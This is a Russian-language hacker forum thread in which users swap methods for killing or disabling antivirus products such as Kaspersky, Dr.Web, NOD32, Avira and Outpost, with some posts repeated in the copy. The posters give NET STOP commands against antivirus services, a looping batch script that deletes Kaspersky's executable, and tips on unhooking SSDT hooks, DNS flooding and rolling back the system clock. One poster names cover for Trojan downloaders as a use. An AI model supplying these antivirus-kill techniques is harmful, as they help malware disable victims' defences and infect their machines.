Народ предлагаю выкладывать способы уничтожения баз и завершения процессов антивирусов таких как Касперский, Dr.Web, NOD32, Avast, Avira, Outpost!
-
XSS.stack #1 – первый литературный журнал от юзеров форума
О том, как унечтожить антивирус
- Автор темы System_Matrix
- Дата начала
вообще тут 2 способа или баги искать или уходить в ring0 и оттуда мочить аверов.
с такой орфографией в помощь тебе только "taskkill /?" 
- Автор темы
- Добавить закладку
- #4
Это понятно! Я предлагаю выкладывать конкретные способы!
- Автор темы
- Добавить закладку
- #5
Ладно!
Я начну:
Есть один способ через командную строку, возможно уже неробит (или робит но не навсех антивирусах)!
:nukesign: Водим команды: NET STOP NAVAOSVC, NET STOP PERSFW и NET STOP AVPCC :nukesign:
:excl: Знаю точно что эти команды использует вирус Trojan.Win32.Killav.bx :holloween:
Я начну:
Есть один способ через командную строку, возможно уже неробит (или робит но не навсех антивирусах)!
:nukesign: Водим команды: NET STOP NAVAOSVC, NET STOP PERSFW и NET STOP AVPCC :nukesign:
:excl: Знаю точно что эти команды использует вирус Trojan.Win32.Killav.bx :holloween:
забудь про эту чушь :shit: , и вообще про ring3 если ты хочешь сносить антивирусы
Если я не ошибаюсь то ТС к нам пришёл с WASM где он всех достал этими темами и гениальными идеями
Это неактуально уже, к сожалению!!! НО есть вариант задедосить любой антивирус!
Смотри:
Код:
ping -n 777 -l 1000 %antivirus_name%Только не злоупотребляй этим зиродэй кодом! Потому что есть УК РФ, который регламентирует эти действия (ст.131 "Изнасилование", ст.134 "Секс с несовершеннолетними" и ст.145 "Необоснованный отказ в приеме на работу").
- Автор темы
- Добавить закладку
- #9
Незнаю у меня невышло! Антивири съедают и не давятся!
Если тот пост не помог, значит тебе сюда друг :
delavp.bat
этот специально подготовленный батник, который в цикле пытается удалить езке антивируса, в момент минутной слабости антивируса сносит его. Особенно тогда когда АВ обновляется он больше всего подвержен подобного рода атакам, так как отвлекается от проверки файлов и самозащиты на получение обнов с сервака и наиболее уязвим в этот момент.
Так же попоробуй использовать всякого рода мероприятия по компроментации АВ и психологического давления...
p.s. только не надо говорить мне спасибо - это моя работа помогать начинающим хэккерам :punk:
delavp.bat
Код:
@echo off
:try
del "C:\program files\Kaspersky Internet Security 2009\avp.exe"
if exist "C:\program files\Kaspersky Internet Security 2009\avp.exe"
goto try
del delavp.batТак же попоробуй использовать всякого рода мероприятия по компроментации АВ и психологического давления...
p.s. только не надо говорить мне спасибо - это моя работа помогать начинающим хэккерам :punk:
Для начала научись кривые AV-хуки килять.. да так, чтобы систему жертвы не ронять.. иначе мяско(после бсода) на аверские форумы побежит жаловаться, тут сталобыть и сказочке конец будет
Как килять AV-хуки, можешь у RKU подсмотреть(дяди умные кодили), и даже если хорошо погуглить то, можно найти базу для ИДЫ уже с готовым реверсом, остаеццо только изучить тех. аспекты и вперед всех нах убиВаТь %)) (исходники и идеи тебе вот так просто, естественно никто не даст, забудь и наивно не надейся)
ЗЫ: и перестань читать хЕкер журналы 90-х – 200.. годов, лучше йаду выпей!
Как килять AV-хуки, можешь у RKU подсмотреть(дяди умные кодили), и даже если хорошо погуглить то, можно найти базу для ИДЫ уже с готовым реверсом, остаеццо только изучить тех. аспекты и вперед всех нах убиВаТь %)) (исходники и идеи тебе вот так просто, естественно никто не даст, забудь и наивно не надейся)
ЗЫ: и перестань читать хЕкер журналы 90-х – 200.. годов, лучше йаду выпей!
вот 2 еще способа аля System_Matrix:
1) Когда-то читал что аутпост может слететь при интенсивной отправке dns пакетов в макс возможное число потоков - скорей всего связано с криворукостью девелоперов
2) переводить время например на 3 года назад, чтоб слетала информация о лицензии и ав деактивировался
1) Когда-то читал что аутпост может слететь при интенсивной отправке dns пакетов в макс возможное число потоков - скорей всего связано с криворукостью девелоперов
2) переводить время например на 3 года назад, чтоб слетала информация о лицензии и ав деактивировался
Кстати такой был и правдо, в своё время работало на каспере, ноде и дрвебе, но это было пару лет назад.
- Автор темы
- Добавить закладку
- #14
Спасибо!!!! Как я раньше не додумолся!!!!! :bang:
Все лиш маленький не полящийся скриптик!!!!!
:yahoo: И антивирям ХАНА!!! :rip2: Дааа это особено удобно для Trojan-Downloader!!!
Если исключительно в ознакомительных целях, а не для прикрытия всяких не хороших коняшек ... Можно переименовать формат исполняемого файла антивиря и ребутнуть машину =))(С кашпировским канешн такое не прокатит)
сомневаюсь что хоть с одним более-менее свежим авером такое прокатит
Хз, но год назад на Ноде и Вебе адназначно катило =)
- Автор темы
- Добавить закладку
- #18
Но это было год назад!
doctor web до пятой версии завершается обычным killtask('spidernt.exe') в дельфях (для особоинтересующихся погуглить и найтине проблема...)
с пятой версии там уже идет защита процесса от снятия
авиру можно убить перехватываю SSDT хуки. (работает и с последней версией)
по поводу нода эта тема не покатит...
с каспером тоже дела не очень обстоят... возможно и есть какие-либо способы, но они приват однозначно
)с пятой версии там уже идет защита процесса от снятия
авиру можно убить перехватываю SSDT хуки. (работает и с последней версией)
по поводу нода эта тема не покатит...
с каспером тоже дела не очень обстоят... возможно и есть какие-либо способы, но они приват однозначно
Delete...